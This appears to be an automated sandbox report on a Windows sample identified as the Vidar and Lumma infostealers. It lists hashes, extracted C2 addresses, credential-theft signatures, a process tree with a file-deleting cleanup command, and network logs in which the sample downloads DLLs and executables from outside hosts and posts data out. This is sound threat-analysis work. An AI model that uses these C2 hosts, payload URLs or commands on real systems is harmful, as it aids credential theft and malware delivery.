Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240910-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/09/2024, 23:33 UTC

General

  • Target

    file.exe

  • Size

    292KB

  • MD5

    4a8a0ccfecc930091116324c79c1006e

  • SHA1

    d790befcbc31a4befafeaf08879e15f99633b2a1

  • SHA256

    146b7006b041d25b6846c797234f38387ec4b141c4a7e4f100d0e6d2eda29088

  • SHA512

    ffef04766c2a9f9d038ccf6156ac7f03a0e0809adaf245a1347e5ece6ad31f9b37f283d71d34c031350456f30036078d5a3e97fa563bf6af6a8fcf6edeeb25d2

  • SSDEEP

    6144:eOqbmw1o1lVPSPP0qoKQy7xfkx2mjou4sFlOpHS9oEO:dOX05KKcbsTiHS6EO

Malware Config

Extracted

Family

vidar

C2

https://t.me/edm0d

https://steamcommunity.com/profiles/76561199768374681

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0

Extracted

Family

lumma

C2

https://questionmwq.shop/api

https://chickerkuso.shop/api

https://achievenmtynwjq.shop/api

https://puredoffustow.shop/api

https://opponnentduei.shop/api

https://metallygaricwo.shop/api

https://milldymarskwom.shop/api

https://quotamkdsdqo.shop/api

https://carrtychaintnyw.shop/api

Signatures

  • Detect Vidar Stealer 17 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3084
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
      • Checks computer location settings
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:312
      • C:\ProgramData\CGDGCFBAEG.exe
        "C:\ProgramData\CGDGCFBAEG.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2212
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3908
      • C:\ProgramData\IIEBAFCBKF.exe
        "C:\ProgramData\IIEBAFCBKF.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4480
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:2892
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFHDBGIEBFI" & exit
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5008
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 10
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:4136

Network

  • flag-us
    DNS
    58.55.71.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    58.55.71.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    67.31.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    67.31.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    t.me
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    t.me
    IN A
    Response
    t.me
    IN A
    149.154.167.99
  • flag-nl
    GET
    https://t.me/edm0d
    RegAsm.exe
    Remote address:
    149.154.167.99:443
    Request
    GET /edm0d HTTP/1.1
    Host: t.me
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Thu, 19 Sep 2024 23:33:10 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 12287
    Connection: keep-alive
    Set-Cookie: stel_ssid=d92373b31a9965fef1_17716598562039938540; expires=Fri, 20 Sep 2024 23:33:10 GMT; path=/; samesite=None; secure; HttpOnly
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: ALLOW-FROM https://web.telegram.org
    Content-Security-Policy: frame-ancestors https://web.telegram.org
    Strict-Transport-Security: max-age=35768000
  • flag-de
    GET
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:10 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    99.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    99.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    41.249.124.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    41.249.124.192.in-addr.arpa
    IN PTR
    Response
    41.249.124.192.in-addr.arpa
    IN PTR
    cloudproxy10041sucurinet
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BFBAAFHDHCBGCAKFHDAK
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 256
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    195.0.202.116.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    195.0.202.116.in-addr.arpa
    IN PTR
    Response
    195.0.202.116.in-addr.arpa
    IN PTR
    static1950202116clients your-serverde
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BGIJEGCGDGHDHIDHDGCB
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBK
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 332
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJEC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 4701
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    GET
    https://116.202.0.195/sqlp.dll
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET /sqlp.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:14 GMT
    Content-Type: application/octet-stream
    Content-Length: 2459136
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:14 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAA
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 437
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHD
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 437
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    GET
    https://116.202.0.195/freebl3.dll
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET /freebl3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:17 GMT
    Content-Type: application/octet-stream
    Content-Length: 685392
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:17 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    GET
    https://116.202.0.195/mozglue.dll
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET /mozglue.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:17 GMT
    Content-Type: application/octet-stream
    Content-Length: 608080
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:17 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    GET
    https://116.202.0.195/msvcp140.dll
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET /msvcp140.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:18 GMT
    Content-Type: application/octet-stream
    Content-Length: 450024
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:18 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    GET
    https://116.202.0.195/softokn3.dll
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET /softokn3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:18 GMT
    Content-Type: application/octet-stream
    Content-Length: 257872
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:18 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    GET
    https://116.202.0.195/vcruntime140.dll
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET /vcruntime140.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:18 GMT
    Content-Type: application/octet-stream
    Content-Length: 80880
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:18 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    GET
    https://116.202.0.195/nss3.dll
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET /nss3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:19 GMT
    Content-Type: application/octet-stream
    Content-Length: 2046288
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:19 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IIIDAKJDHJKFHIEBFCGH
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 1025
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBA
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCB
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 461
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHI
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 120797
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.211.185.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.211.185.52.in-addr.arpa
    IN PTR
    Response
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AEHIECAFCGDBFHIDBKFC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-ch
    GET
    http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exe
    RegAsm.exe
    Remote address:
    147.45.44.104:80
    Request
    GET /prog/66ecb454d2b4a_lgfdsjgds.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 147.45.44.104
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:23 GMT
    Content-Type: application/octet-stream
    Content-Length: 363424
    Last-Modified: Thu, 19 Sep 2024 23:31:32 GMT
    Connection: keep-alive
    Keep-Alive: timeout=120
    ETag: "66ecb454-58ba0"
    X-Content-Type-Options: nosniff
    Accept-Ranges: bytes
  • flag-ch
    GET
    http://147.45.44.104/prog/66ecb44c35444_vfdhsgdf.exe
    RegAsm.exe
    Remote address:
    147.45.44.104:80
    Request
    GET /prog/66ecb44c35444_vfdhsgdf.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 147.45.44.104
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:25 GMT
    Content-Type: application/octet-stream
    Content-Length: 299936
    Last-Modified: Thu, 19 Sep 2024 23:31:24 GMT
    Connection: keep-alive
    Keep-Alive: timeout=120
    ETag: "66ecb44c-493a0"
    X-Content-Type-Options: nosniff
    Accept-Ranges: bytes
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDB
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 499
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    104.44.45.147.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.44.45.147.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    questionmwq.shop
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    questionmwq.shop
    IN A
    Response
    questionmwq.shop
    IN A
    172.67.204.62
    questionmwq.shop
    IN A
    104.21.85.92
  • flag-us
    POST
    https://questionmwq.shop/api
    RegAsm.exe
    Remote address:
    172.67.204.62:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: questionmwq.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=m7f79rc5hi5fga1fia7g3cjqj0; expires=Mon, 13 Jan 2025 17:20:05 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k0rMAkm%2BfFNILF1KEbspyRU2fZurmLwvv77bl9%2FuvVo3erFfQlEXsPv2W3mLPleBwiR0UDfr%2F2f51xqUxI9atjWgkSIbPULzIZqOVIuvCDNHMeHNMMQcJYnJo7C8hJ16GLAg"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d6177ea1763d5-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    62.204.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    62.204.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    chickerkuso.shop
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    chickerkuso.shop
    IN A
    Response
    chickerkuso.shop
    IN A
    172.67.173.81
    chickerkuso.shop
    IN A
    104.21.88.61
  • flag-us
    POST
    https://chickerkuso.shop/api
    RegAsm.exe
    Remote address:
    172.67.173.81:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: chickerkuso.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:27 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=eq97067ifjpvesoo4srduhko8p; expires=Mon, 13 Jan 2025 17:20:06 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Lcvqlqyvaovme2dYTbeSKXkDwovlQisJMafdTIAgH6p7aKyv%2FivdvsF0SQgYrUkKi43g04L4DnAkvY4V14txdEYxBsdMy1xQyVof3BRVANhgGuvaJZh0L%2Fs8FAV8MtqW5kM"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d617bba4071fb-LHR
  • flag-us
    DNS
    achievenmtynwjq.shop
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    achievenmtynwjq.shop
    IN A
    Response
    achievenmtynwjq.shop
    IN A
    104.21.39.77
    achievenmtynwjq.shop
    IN A
    172.67.143.200
  • flag-us
    POST
    https://achievenmtynwjq.shop/api
    RegAsm.exe
    Remote address:
    104.21.39.77:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: achievenmtynwjq.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:27 GMT
    Content-Type: text/html; charset=UTF-8
